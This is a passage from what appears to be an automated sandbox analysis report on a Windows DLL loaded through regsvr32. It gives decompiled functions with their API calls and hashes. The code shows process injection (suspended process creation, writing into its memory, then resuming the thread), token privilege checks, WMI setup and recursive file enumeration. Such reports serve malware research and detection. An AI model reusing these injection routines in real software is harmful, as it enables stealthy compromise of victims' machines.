                                          • API String ID: 3410906232-0
                                          • Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                                          • Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
                                          • Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                                          • Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 430 1000ca25-1000ca45 call 1000c8fd 433 1000cb73-1000cb76 430->433 434 1000ca4b-1000ca6c call 1000a86d 430->434 437 1000ca72-1000ca74 434->437 438 1000cb63-1000cb72 call 1000861a 434->438 439 1000cb51-1000cb61 call 1000861a 437->439 440 1000ca7a 437->440 438->433 439->438 443 1000ca7d-1000ca7f 440->443 446 1000cb42-1000cb4b 443->446 447 1000ca85-1000ca9b call 1000ae66 443->447 446->437 446->439 450 1000cb00-1000cb04 447->450 451 1000ca9d-1000cab0 call 1000cb77 447->451 452 1000cb06-1000cb08 450->452 453 1000cb2f-1000cb3c 450->453 451->450 458 1000cab2-1000caca 451->458 455 1000cb19-1000cb29 452->455 456 1000cb0a-1000cb10 452->456 453->443 453->446 455->453 456->455 458->450 461 1000cacc-1000cae7 GetLastError ResumeThread 458->461 462 1000cae9-1000caf4 461->462 463 1000cafc-1000cafd CloseHandle 461->463 465 1000caf6 462->465 466 1000caf7 462->466 463->450 465->466 466->463
                                          C-Code - Quality: 89%
                                          			E1000CA25(intOrPtr __edx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				void* _v36;
                                          				char _v40;
                                          				char _v80;
                                          				char _t37;
                                          				intOrPtr _t38;
                                          				void* _t45;
                                          				intOrPtr _t47;
                                          				intOrPtr _t48;
                                          				intOrPtr _t50;
                                          				intOrPtr _t52;
                                          				void* _t54;
                                          				intOrPtr _t57;
                                          				long _t61;
                                          				intOrPtr _t62;
                                          				signed int _t65;
                                          				signed int _t68;
                                          				signed int _t82;
                                          				void* _t85;
                                          				char _t86;
                                          
                                          				_v8 = _v8 & 0x00000000;
                                          				_v20 = __edx;
                                          				_t65 = 0;
                                          				_t37 = E1000C8FD( &_v8);
                                          				_t86 = _t37;
                                          				_v24 = _t86;
                                          				_t87 = _t86;
                                          				if(_t86 == 0) {
                                          					return _t37;
                                          				}
                                          				_t38 =  *0x1001e688; // 0x2de0590
                                          				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
                                          				_t82 = _v8;
                                          				_t68 = 0;
                                          				_v16 = 0;
                                          				if(_t82 == 0) {
                                          					L20:
                                          					E1000861A( &_v24, 0);
                                          					return _t65;
                                          				}
                                          				while(_t65 == 0) {
                                          					while(_t65 == 0) {
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
                                          						_t92 = _t45;
                                          						if(_t45 >= 0) {
                                          							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
                                          							if(_t54 != 0) {
                                          								_t57 =  *0x1001e684; // 0x2e5faa0
                                          								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
                                          								if(_t85 != 0) {
                                          									GetLastError();
                                          									_t61 = ResumeThread(_v36);
                                          									_t62 =  *0x1001e684; // 0x2e5faa0
                                          									if(_t61 != 0) {
                                          										_push(0xea60);
                                          										_push(_t85);
                                          										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
                                          											_t65 = _t65 + 1;
                                          										}
                                          										_t62 =  *0x1001e684; // 0x2e5faa0
                                          									}
                                          									CloseHandle(_t85);
                                          								}
                                          							}
                                          						}
                                          						if(_v40 != 0) {
                                          							if(_t65 == 0) {
                                          								_t52 =  *0x1001e684; // 0x2e5faa0
                                          								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
                                          							}
                                          							_t48 =  *0x1001e684; // 0x2e5faa0
                                          							 *((intOrPtr*)(_t48 + 0x30))(_v36);
                                          							_t50 =  *0x1001e684; // 0x2e5faa0
                                          							 *((intOrPtr*)(_t50 + 0x30))(_v40);
                                          						}
                                          						_t68 = _v16;
                                          						_t47 = _v12 + 1;
                                          						_v12 = _t47;
                                          						if(_t47 < 2) {
                                          							continue;
                                          						} else {
                                          							break;
                                          						}
                                          					}
                                          					_t82 = _v8;
                                          					_t68 = _t68 + 1;
                                          					_v16 = _t68;
                                          					if(_t68 < _t82) {
                                          						continue;
                                          					} else {
                                          						break;
                                          					}
                                          					do {
                                          						goto L19;
                                          					} while (_t82 != 0);
                                          					goto L20;
                                          				}
                                          				L19:
                                          				E1000861A(_t86, 0xfffffffe);
                                          				_t86 = _t86 + 4;
                                          				_t82 = _t82 - 1;
                                          			}




























                                          APIs
                                            • Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
                                            • Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                                            • Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
                                            • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                                            • Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                                            • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                                            • Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                                          • GetLastError.KERNEL32(?,00000001), ref: 1000CACC
                                          • ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
                                          • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
                                          • String ID:
                                          • API String ID: 1274669455-0
                                          • Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                                          • Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
                                          • Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                                          • Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 467 1000b998-1000b9b8 GetTokenInformation 468 1000b9ba-1000b9c3 GetLastError 467->468 469 1000b9fe 467->469 468->469 471 1000b9c5-1000b9d5 call 10008604 468->471 470 1000ba00-1000ba04 469->470 474 1000b9d7-1000b9d9 471->474 475 1000b9db-1000b9ee GetTokenInformation 471->475 474->470 475->469 476 1000b9f0-1000b9fc call 1000861a 475->476 476->474
                                          C-Code - Quality: 86%
                                          			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _t12;
                                          				void* _t20;
                                          				void* _t22;
                                          				union _TOKEN_INFORMATION_CLASS _t28;
                                          				void* _t31;
                                          
                                          				_push(_t22);
                                          				_push(_t22);
                                          				_t31 = 0;
                                          				_t28 = __edx;
                                          				_t20 = _t22;
                                          				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                          					L6:
                                          					_t12 = _t31;
                                          				} else {
                                          					_t31 = E10008604(_v8);
                                          					_v12 = _t31;
                                          					if(_t31 != 0) {
                                          						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                          							goto L6;
                                          						} else {
                                          							E1000861A( &_v12, _t16);
                                          							goto L3;
                                          						}
                                          					} else {
                                          						L3:
                                          						_t12 = 0;
                                          					}
                                          				}
                                          				return _t12;
                                          			}











                                          APIs
                                          • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                                          • GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                                            • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                          • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InformationToken$AllocErrorHeapLast
                                          • String ID:
                                          • API String ID: 4258577378-0
                                          • Opcode ID: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
                                          • Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
                                          • Opcode Fuzzy Hash: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
                                          • Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 612 1000ae66-1000aeb3 memset CreateProcessW
                                          C-Code - Quality: 47%
                                          			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                          				struct _STARTUPINFOW _v72;
                                          				signed int _t11;
                                          				WCHAR* _t15;
                                          				int _t19;
                                          				struct _PROCESS_INFORMATION* _t20;
                                          
                                          				_t20 = __edx;
                                          				_t15 = __ecx;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t19 = 0x44;
                                          				memset( &_v72, 0, _t19);
                                          				_v72.cb = _t19;
                                          				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
                                          				asm("sbb eax, eax");
                                          				return  ~( ~_t11) - 1;
                                          			}









                                          APIs
                                          • memset.MSVCRT ref: 1000AE85
                                          • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcessmemset
                                          • String ID:
                                          • API String ID: 2296119082-0
                                          • Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                                          • Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
                                          • Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                                          • Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 47%
                                          			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                                          				char _v8;
                                          				char _t5;
                                          				struct HINSTANCE__* _t7;
                                          				void* _t10;
                                          				void* _t12;
                                          				void* _t22;
                                          				void* _t25;
                                          
                                          				_push(__ecx);
                                          				_t12 = __ecx;
                                          				_t22 = __edx;
                                          				_t5 = E100095C7(_a4);
                                          				_t25 = 0;
                                          				_v8 = _t5;
                                          				_push(_t5);
                                          				if(_a4 != 0x7c3) {
                                          					_t7 = LoadLibraryA(); // executed
                                          				} else {
                                          					_t7 = GetModuleHandleA();
                                          				}
                                          				if(_t7 != 0) {
                                          					_t10 = E1000E171(_t12, _t22, _t7); // executed
                                          					_t25 = _t10;
                                          				}
                                          				E100085C2( &_v8);
                                          				return _t25;
                                          			}











                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 4133054770-0
                                          • Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                                          • Instruction ID: 73ed2ebf8e11191eb6597406948a09e9f6d4d80ef2ff5e7d934a0b04cc0c2bea
                                          • Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                                          • Instruction Fuzzy Hash: 92F08231704254ABE704DB69DC8589EB7EDEB547D1710402AF406E3255DA70DE0087A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
                                          				CHAR* _v8;
                                          				int _t28;
                                          				signed int _t31;
                                          				signed int _t34;
                                          				signed int _t35;
                                          				void* _t38;
                                          				signed int* _t41;
                                          
                                          				_t41 = _a8;
                                          				_t31 = 0;
                                          				if(_t41[1] > 0) {
                                          					_t38 = 0;
                                          					do {
                                          						_t3 =  &(_t41[2]); // 0xe6840d8b
                                          						_t34 =  *_t3;
                                          						_t35 = 0;
                                          						_a8 = 0;
                                          						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
                                          							_v8 = _a4 + 0x24;
                                          							while(1) {
                                          								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
                                          								_t14 =  &(_t41[2]); // 0xe6840d8b
                                          								_t34 =  *_t14;
                                          								if(_t28 == 0) {
                                          									break;
                                          								}
                                          								_t35 = _a8 + 1;
                                          								_a8 = _t35;
                                          								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
                                          									continue;
                                          								} else {
                                          								}
                                          								goto L8;
                                          							}
                                          							 *_t41 =  *_t41 |  *(_t34 + _t38);
                                          						}
                                          						L8:
                                          						_t31 = _t31 + 1;
                                          						_t38 = _t38 + 0x10;
                                          						_t20 =  &(_t41[1]); // 0x1374ff85
                                          					} while (_t31 <  *_t20);
                                          				}
                                          				Sleep(0xa);
                                          				return 1;
                                          			}











                                          APIs
                                          • lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
                                          • Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleeplstrcmpi
                                          • String ID:
                                          • API String ID: 1261054337-0
                                          • Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                                          • Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
                                          • Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                                          • Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E10005E96() {
                                          				intOrPtr _t3;
                                          
                                          				_t3 =  *0x1001e684; // 0x2e5faa0
                                          				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
                                          				ExitProcess(0);
                                          			}





                                          APIs
                                          • ExitProcess.KERNEL32(00000000), ref: 10005EAD
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                                          • Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
                                          • Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                                          • Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E100085EF() {
                                          				void* _t1;
                                          
                                          				_t1 = HeapCreate(0, 0x80000, 0); // executed
                                          				 *0x1001e768 = _t1;
                                          				return _t1;
                                          			}





                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateHeap
                                          • String ID:
                                          • API String ID: 10892065-0
                                          • Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                                          • Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
                                          • Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                                          • Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 47%
                                          			E1000BA62(void* __ecx, void* __esi) {
                                          				intOrPtr* _v8;
                                          				char _v12;
                                          				void* _v16;
                                          				char _v20;
                                          				char _v24;
                                          				short _v28;
                                          				char _v32;
                                          				void* _t20;
                                          				intOrPtr* _t21;
                                          				intOrPtr _t29;
                                          				intOrPtr _t31;
                                          				intOrPtr* _t33;
                                          				intOrPtr _t34;
                                          				char _t37;
                                          				union _TOKEN_INFORMATION_CLASS _t44;
                                          				char _t45;
                                          				intOrPtr* _t48;
                                          
                                          				_t37 = 0;
                                          				_v28 = 0x500;
                                          				_t45 = 0;
                                          				_v32 = 0;
                                          				_t20 = E1000B946(__ecx);
                                          				_v16 = _t20;
                                          				if(_t20 != 0) {
                                          					_push( &_v24);
                                          					_t44 = 2;
                                          					_t21 = E1000B998(_t44); // executed
                                          					_t48 = _t21;
                                          					_v20 = _t48;
                                          					if(_t48 == 0) {
                                          						L10:
                                          						CloseHandle(_v16);
                                          						if(_t48 != 0) {
                                          							E1000861A( &_v20, _t37);
                                          						}
                                          						return _t45;
                                          					}
                                          					_push( &_v12);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0x220);
                                          					_push(0x20);
                                          					_push(2);
                                          					_push( &_v32);
                                          					_t29 =  *0x1001e68c; // 0x2e5fc68
                                          					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                                          						goto L10;
                                          					}
                                          					if( *_t48 <= 0) {
                                          						L9:
                                          						_t31 =  *0x1001e68c; // 0x2e5fc68
                                          						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                                          						_t37 = 0;
                                          						goto L10;
                                          					}
                                          					_t9 = _t48 + 4; // 0x4
                                          					_t33 = _t9;
                                          					_v8 = _t33;
                                          					while(1) {
                                          						_push(_v12);
                                          						_push( *_t33);
                                          						_t34 =  *0x1001e68c; // 0x2e5fc68
                                          						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                                          							break;
                                          						}
                                          						_t37 = _t37 + 1;
                                          						_t33 = _v8 + 8;
                                          						_v8 = _t33;
                                          						if(_t37 <  *_t48) {
                                          							continue;
                                          						}
                                          						goto L9;
                                          					}
                                          					_t45 = 1;
                                          					goto L9;
                                          				}
                                          				return _t20;
                                          			}




















                                          APIs
                                            • Part of subcall function 1000B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
                                            • Part of subcall function 1000B946: GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
                                            • Part of subcall function 1000B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980
                                            • Part of subcall function 1000B998: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                                            • Part of subcall function 1000B998: GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                                          • CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentErrorLast$CloseHandleInformationProcessThreadToken
                                          • String ID:
                                          • API String ID: 3752664914-0
                                          • Opcode ID: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
                                          • Instruction ID: 211ecb97cd29a0990eca88f75de2d619fb9b913ff1731f7459bcb712159e1349
                                          • Opcode Fuzzy Hash: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
                                          • Instruction Fuzzy Hash: A5217F71A00615AFEB00DFA9CC85EAEB7F8EF04380F514069F601E7165D770ED008B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 30%
                                          			E1000D523(void* __ecx) {
                                          				char _v8;
                                          				void* _v12;
                                          				char* _t15;
                                          				intOrPtr* _t16;
                                          				void* _t21;
                                          				intOrPtr* _t23;
                                          				intOrPtr* _t24;
                                          				intOrPtr* _t25;
                                          				void* _t30;
                                          				void* _t33;
                                          
                                          				_v12 = 0;
                                          				_v8 = 0;
                                          				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                          				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                          				_t15 =  &_v12;
                                          				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
                                          				if(_t15 < 0) {
                                          					L5:
                                          					_t23 = _v8;
                                          					if(_t23 != 0) {
                                          						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                          					}
                                          					_t24 = _v12;
                                          					if(_t24 != 0) {
                                          						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                          					}
                                          					_t16 = 0;
                                          				} else {
                                          					__imp__#2(__ecx);
                                          					_t25 = _v12;
                                          					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                          					if(_t21 < 0) {
                                          						goto L5;
                                          					} else {
                                          						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                          						if(_t21 < 0) {
                                          							goto L5;
                                          						} else {
                                          							_t16 = E10008604(8);
                                          							if(_t16 == 0) {
                                          								goto L5;
                                          							} else {
                                          								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                          								 *_t16 = _v8;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t16;
                                          			}













                                          APIs
                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                                          • CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                                          • SysAllocString.OLEAUT32(00000000), ref: 1000D569
                                          • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                                            • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
                                          • String ID:
                                          • API String ID: 2855449287-0
                                          • Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                                          • Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
                                          • Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                                          • Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E1000AEB4(void* __ecx, void* __fp0, intOrPtr _a16) {
                                          				char _v12;
                                          				WCHAR* _v16;
                                          				short _v560;
                                          				short _v562;
                                          				struct _WIN32_FIND_DATAW _v608;
                                          				WCHAR* _t27;
                                          				void* _t31;
                                          				int _t36;
                                          				intOrPtr _t37;
                                          				intOrPtr _t44;
                                          				void* _t48;
                                          				intOrPtr _t49;
                                          				void* _t51;
                                          				intOrPtr _t56;
                                          				void* _t61;
                                          				char _t62;
                                          				void* _t63;
                                          				void* _t64;
                                          				void* _t65;
                                          				void* _t80;
                                          
                                          				_t80 = __fp0;
                                          				_push(0);
                                          				_t51 = __ecx;
                                          				_push(L"\\*");
                                          				_t27 = E100092E5(__ecx);
                                          				_t65 = _t64 + 0xc;
                                          				_v16 = _t27;
                                          				if(_t27 == 0) {
                                          					return _t27;
                                          				}
                                          				_t61 = FindFirstFileW(_t27,  &_v608);
                                          				if(_t61 == 0xffffffff) {
                                          					L18:
                                          					return E1000861A( &_v16, 0xfffffffe);
                                          				}
                                          				_t31 = 0x2e;
                                          				do {
                                          					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
                                          						if((_v608.dwFileAttributes & 0x00000010) != 0) {
                                          							L14:
                                          							_push(0);
                                          							_push( &(_v608.cFileName));
                                          							_push("\\");
                                          							_t62 = E100092E5(_t51);
                                          							_t65 = _t65 + 0x10;
                                          							_v12 = _t62;
                                          							if(_t62 != 0) {
                                          								_t56 =  *0x1001e684; // 0x2e5faa0
                                          								 *((intOrPtr*)(_t56 + 0xb4))(1);
                                          								_push(1);
                                          								_push(1);
                                          								_push(0);
                                          								E1000AEB4(_t62, _t80, 1, 5, E1000EFAA, _a16);
                                          								_t65 = _t65 + 0x1c;
                                          								E1000861A( &_v12, 0xfffffffe);
                                          							}
                                          							goto L16;
                                          						}
                                          						_t63 = 0;
                                          						do {
                                          							_t10 = _t63 + 0x1001e78c; // 0x0
                                          							_push( *_t10);
                                          							_push( &(_v608.cFileName));
                                          							_t44 =  *0x1001e690; // 0x2e5fd40
                                          							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
                                          								goto L12;
                                          							}
                                          							_t48 = E1000EFAA(_t80, _t51,  &_v608, _a16);
                                          							_t65 = _t65 + 0xc;
                                          							if(_t48 == 0) {
                                          								break;
                                          							}
                                          							_t49 =  *0x1001e684; // 0x2e5faa0
                                          							 *((intOrPtr*)(_t49 + 0xb4))(1);
                                          							L12:
                                          							_t63 = _t63 + 4;
                                          						} while (_t63 < 4);
